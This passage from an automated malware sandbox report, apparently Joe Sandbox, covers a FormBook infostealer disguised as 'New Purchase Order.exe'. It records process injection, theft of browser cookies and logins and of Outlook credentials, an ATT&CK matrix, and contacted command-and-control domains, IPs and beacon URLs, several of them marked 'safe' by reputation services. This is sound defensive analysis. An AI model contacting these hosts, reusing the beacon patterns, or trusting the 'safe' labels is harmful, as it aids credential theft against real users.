            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Users\user\AppData\Roaming\ibDqDkseW.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1507701 Sample: New Purchase Order.exe Startdate: 09/09/2024 Architecture: WINDOWS Score: 100 61 www.nevsehir-nakliyat.xyz 2->61 63 www.theaji.shop 2->63 65 19 other IPs or domains 2->65 79 Suricata IDS alerts for network traffic 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 Sigma detected: Scheduled temp file as task from temp location 2->83 87 10 other signatures 2->87 10 New Purchase Order.exe 7 2->10         started        14 ibDqDkseW.exe 5 2->14         started        signatures3 85 Performs DNS queries to domains with low reputation 61->85 process4 file5 53 C:\Users\user\AppData\Roaming\ibDqDkseW.exe, PE32 10->53 dropped 55 C:\Users\...\ibDqDkseW.exe:Zone.Identifier, ASCII 10->55 dropped 57 C:\Users\user\AppData\Local\...\tmp83A4.tmp, XML 10->57 dropped 59 C:\Users\user\...59ew Purchase Order.exe.log, ASCII 10->59 dropped 89 Adds a directory exclusion to Windows Defender 10->89 91 Injects a PE file into a foreign processes 10->91 16 New Purchase Order.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        93 Multi AV Scanner detection for dropped file 14->93 95 Machine Learning detection for dropped file 14->95 25 schtasks.exe 1 14->25         started        27 ibDqDkseW.exe 14->27         started        29 ibDqDkseW.exe 14->29         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 16->73 31 kdFPsEWDpy.exe 16->31 injected 75 Loading BitLocker PowerShell Module 19->75 34 WmiPrvSE.exe 19->34         started        36 conhost.exe 19->36         started        38 conhost.exe 21->38         started        40 conhost.exe 23->40         started        42 conhost.exe 25->42         started        process9 signatures10 105 Found direct / indirect Syscall (likely to bypass EDR) 31->105 44 setupugc.exe 31->44         started        process11 signatures12 97 Tries to steal Mail credentials (via file / registry access) 44->97 99 Tries to harvest and steal browser information (history, passwords, etc) 44->99 101 Modifies the context of a thread in another process (thread injection) 44->101 103 3 other signatures 44->103 47 kdFPsEWDpy.exe 44->47 injected 51 firefox.exe 44->51         started        process13 dnsIp14 67 sorriragora.online 162.240.81.18, 49779, 49780, 49781 UNIFIEDLAYER-AS-1US United States 47->67 69 nosr.net 82.221.128.183, 49741, 80 THORDC-ASIS Iceland 47->69 71 10 other IPs or domains 47->71 77 Found direct / indirect Syscall (likely to bypass EDR) 47->77 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            New Purchase Order.exe31%VirustotalBrowse
            New Purchase Order.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\ibDqDkseW.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\ibDqDkseW.exe21%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            nosr.net0%VirustotalBrowse
            dns.ladipage.com0%VirustotalBrowse
            www.complexity.pub1%VirustotalBrowse
            sorriragora.online1%VirustotalBrowse
            www.dyme.tech0%VirustotalBrowse
            www.sorriragora.online1%VirustotalBrowse
            www.lilibetmed.online2%VirustotalBrowse
            www.jyourwd.store0%VirustotalBrowse
            www.angelenterprise.biz0%VirustotalBrowse
            www.nevsehir-nakliyat.xyz1%VirustotalBrowse
            www.masteriocp.online1%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.theaji.shop0%VirustotalBrowse
            www.monos.shop0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.fontbureau.com/designersG0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers/?0%Avira URL Cloudsafe
            http://www.fvti.cloud/dw6h/?lt=R/pE8KC/c36ywADQh5FkOiDH8KVbuy/iFFPQAWrjddfpU+7mPUq4raSb1MURPFl7uYa4SfXFDOIuFXNkiFpjga1JutrdCl+XzV0YaijSh6Fqy01qwtES1vY=&3ry=nj20Xr0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
            https://fe3e9h.com:9009/register0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers?0%Avira URL Cloudsafe
            http://www.dyme.tech/pjne/0%Avira URL Cloudsafe
            http://www.lilibetmed.online/3cch/0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers/?0%VirustotalBrowse
            http://www.sorriragora.online/3i7y/?lt=7+2uneOBixDDmhLFRXF/ufkAm5AC1SXFsWvwANuZC0TQ0YERrtM9rlugcy5pD3j7o6sEidpw3wSWmiKn6bu88qr2mjlQFSGqmkD6eyB8L9Z0Lf+o3Q/3u6k=&3ry=nj20Xr0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers?0%VirustotalBrowse
            http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
            http://www.fontbureau.com/designersG0%VirustotalBrowse
            http://www.tiro.com0%VirustotalBrowse
            http://www.tiro.com0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers0%VirustotalBrowse
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%VirustotalBrowse
            http://www.masteriocp.online/wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=0%Avira URL Cloudsafe
            http://www.lilibetmed.online/3cch/?3ry=nj20Xr&lt=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI=0%Avira URL Cloudsafe
            http://www.sorriragora.online/3i7y/0%Avira URL Cloudsafe
            http://www.complexity.pub/4c7j/?3ry=nj20Xr&lt=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM=0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%Avira URL Cloudsafe
            http://www.typography.netD0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%VirustotalBrowse
            http://www.mbwd.store/pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
            http://www.kryto.top/09dt/0%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.sorriragora.online/3i7y/1%VirustotalBrowse
            http://www.galapagosdesign.com/staff/dennis.htm0%Avira URL Cloudsafe
            http://fedoraproject.org/0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%VirustotalBrowse
            http://www.galapagosdesign.com/DPlease0%Avira URL Cloudsafe
            http://www.jyourwd.store0%Avira URL Cloudsafe
            http://www.fonts.com0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://www.domeneshop.no/whois0%Avira URL Cloudsafe
            http://www.urwpp.deDPlease0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
            http://www.sakkal.com0%Avira URL Cloudsafe
            https://www.domainnameshop.com/whois0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
            http://www.nevsehir-nakliyat.xyz/csz1/?lt=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&3ry=nj20Xr0%Avira URL Cloudsafe
            http://www.fontbureau.com0%Avira URL Cloudsafe
            http://www.complexity.pub/4c7j/0%Avira URL Cloudsafe
            https://www.masteriocp.online/wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJS0%Avira URL Cloudsafe
            http://www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr0%Avira URL Cloudsafe
            http://www.jyourwd.store/6ua2/0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers/cabarga.htmlN0%Avira URL Cloudsafe
            http://www.masteriocp.online/wg84/0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers/frere-user.html0%Avira URL Cloudsafe
            https://www.domainnameshop.com/0%Avira URL Cloudsafe
            http://www.angelenterprise.biz/efkd/0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%Avira URL Cloudsafe
            http://www.nevsehir-nakliyat.xyz/csz1/0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers80%Avira URL Cloudsafe
            http://www.fvti.cloud/dw6h/0%Avira URL Cloudsafe
            http://www.angelenterprise.biz/efkd/?3ry=nj20Xr&lt=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A=0%Avira URL Cloudsafe
            http://www.mbwd.store/pn1r/0%Avira URL Cloudsafe
            http://www.nosr.net/ujbu/?lt=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=&3ry=nj20Xr0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?a06b4d1659d3d0d2e58179ddfe478d250%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            nosr.net
            		82.221.128.183
            		truetrueunknown
            angelenterprise.biz
            		3.33.130.190
            		truetrue
              		unknown
              dns.ladipage.com
              		54.179.173.60
              		truetrueunknown
              www.complexity.pub
              		217.160.0.127
              		truetrueunknown
              sorriragora.online
              		162.240.81.18
              		truetrueunknown
              www.mbwd.store
              		103.42.108.46
              		truetrue
                		unknown
                www.fvti.cloud
                		38.55.112.70
                		truetrue
                  		unknown
                  www.dyme.tech
                  		13.248.169.48
                  		truetrueunknown
                  www.kryto.top
                  		162.0.213.94
                  		truetrue
                    		unknown
                    www.jyourwd.store
                    		54.183.209.210
                    		truetrueunknown
                    www.lilibetmed.online
                    		185.134.245.113
                    		truetrueunknown
                    natroredirect.natrocdn.com
                    		85.159.66.93
                    		truetrueunknown
                    www.sorriragora.online
                    		unknown
                    		unknowntrueunknown
                    www.monos.shop
                    		unknown
                    		unknowntrueunknown
                    www.nosr.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.nevsehir-nakliyat.xyz
                      		unknown
                      		unknowntrueunknown
                      www.masteriocp.online
                      		unknown
                      		unknowntrueunknown
                      www.angelenterprise.biz
                      		unknown
                      		unknowntrueunknown
                      www.theaji.shop
                      		unknown
                      		unknowntrueunknown
                      www.terrearcenciel.online
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.fvti.cloud/dw6h/?lt=R/pE8KC/c36ywADQh5FkOiDH8KVbuy/iFFPQAWrjddfpU+7mPUq4raSb1MURPFl7uYa4SfXFDOIuFXNkiFpjga1JutrdCl+XzV0YaijSh6Fqy01qwtES1vY=&3ry=nj20Xrtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.dyme.tech/pjne/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.lilibetmed.online/3cch/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sorriragora.online/3i7y/?lt=7+2uneOBixDDmhLFRXF/ufkAm5AC1SXFsWvwANuZC0TQ0YERrtM9rlugcy5pD3j7o6sEidpw3wSWmiKn6bu88qr2mjlQFSGqmkD6eyB8L9Z0Lf+o3Q/3u6k=&3ry=nj20Xrtrue
                        • Avira URL Cloud: safe
                        		unknown
